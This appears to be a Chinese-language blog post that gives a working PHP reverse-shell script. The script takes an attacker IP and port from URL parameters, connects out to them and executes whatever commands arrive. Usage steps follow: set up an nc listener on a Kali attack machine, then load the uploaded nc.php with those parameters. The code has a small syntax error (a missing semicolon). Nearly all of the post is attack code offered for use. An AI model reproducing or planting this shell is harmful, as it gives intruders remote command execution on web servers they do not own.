PHP反弹shell
作者:myluzh 分类: PHP 长度:674 阅读:1285
需要传递ip跟port两个参数,ip为攻击机的ip,port为自定义端口
<?php
set_time_limit(0);
$ip=$_GET['ip']
$port=$_GET['port'];
if ($ip == "" and $port == "") {
echo "[ip] [port] not defined";
exit();
}
$fp = @fsockopen($ip, $port, $errno, $errstr);
if (!$fp) {
echo "connection timed out";
} else {
fputs($fp, "\n++++++++++connect success++++++++\n");
while (!feof($fp)) {
fputs($fp, "shell:"); //输出
$shell = fgets($fp);
$message = `$shell`;
fputs($fp, $message);
}
fclose($fp);
}
?>
先在kali攻击机开启监听 nc -nlvp [端口号]
然后访问 nc.php?ip=x.x.x.x&port=x 即可,ip为攻击机ip,端口与攻击机监听端口一致